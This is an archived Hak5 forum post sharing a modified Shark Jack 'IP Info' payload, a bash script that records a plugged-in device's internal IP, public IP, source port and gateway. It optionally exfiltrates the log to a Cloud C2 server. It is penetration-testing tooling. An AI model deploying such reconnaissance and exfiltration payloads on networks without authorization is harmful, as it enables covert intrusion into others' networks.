Jump to content

[PAYLOAD] IP Info


Darren Kitchen

Recommended Posts

  • 5 months later...

Yey! Thank you @Darren Kitchen, that's about what I wanted to create today. There is just one downside: Many of our Internet providers nowadays are using carrier-grade NAT (https://en.wikipedia.org/wiki/Carrier-grade_NAT) and to really identify the internet connection one also needs to know the source port and the exact time of a connection... I searched for quite some time to find a service actually providing this information and included the Port information into the logging. I am pretty sure that there should be some more reliable way in obtaining this information (like from an API) but currently I can't find any. Any suggestions are Welcome!

#!/bin/bash
#
# Original Payload: IP Info by Hak5Darren
# Original Link:    https://github.com/hak5/sharkjack-payloads/blob/master/payloads/library/recon/ipinfo/payload.sh
#
# Description:  This payload gathers internal and external IP address info,
# including default gateway, saving the log to the loot directory and
# optionally exfiltrating the log to Cloud C2 if CLOUDC2=1
#
# LED SETUP (Magenta)... Setting logs and waiting for IP address from DHCP
# LED ATTACK (Yellow Blink)... Saving IP address information
# LED FAIL (Red Blink)... Failed to gather public IP address
# LED SPECIAL (Cyan Blink)... Exfiltrating log to Cloud C2
# LED FINISH (Green Fast Blink to Solid)... Payload successful
 
CLOUDC2=0
LOOT_DIR=/root/loot/ipinfo
PUBLIC_IP_URL="http://ipinfo.io/ip"
 
function FAIL() { LED FAIL; exit; }
LED SETUP
 
# Make log file
mkdir -p $LOOT_DIR
LOG_FILE="ipinfo_$(find $LOOT_DIR -type f | wc -l).log"
LOG="$LOOT_DIR/$LOG_FILE"
 
# Ask for IP address
NETMODE DHCP_CLIENT
 
# Wait until Shark Jack has an IP address
while ! ifconfig eth0 | grep "inet addr"; do sleep 1; done
 
LED ATTACK
# Gather IP info and save log
INTERNALIP=$(ifconfig eth0 | grep "inet addr" | awk {'print $2'} | awk -F: {'print $2'})
GATEWAY=$(route | grep default | awk {'print $2'})
PUBLICIP=$(wget --timeout=30 $PUBLIC_IP_URL -qO -) || FAIL
PUBLICPORT=$(wget --timeout=30 http://www.dnstools.ch/wie-ist-meine-ip.html -qO - | grep 'Remote Port' | egrep -o '[[:digit:]]{2,5}')
echo -e "Date: $(date)\n\
Internal IP Address: $INTERNALIP\n\
Public IP Address: $PUBLICIP\n\
Public Port Number: $PUBLICPORT\n\
Gateway: $GATEWAY\n" >> $LOG
 
# Optionally connect to Cloud C2, wait for connection and exfiltrate loot
if [ "$CLOUDC2" = "1" ]; then
    LED SPECIAL
    C2CONNECT
    while ! pgrep cc-client; do sleep 1; done
    C2EXFIL STRING $LOG IPinfo
fi
 
LED FINISH

PS: I couldn't find the bash highlighting...

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...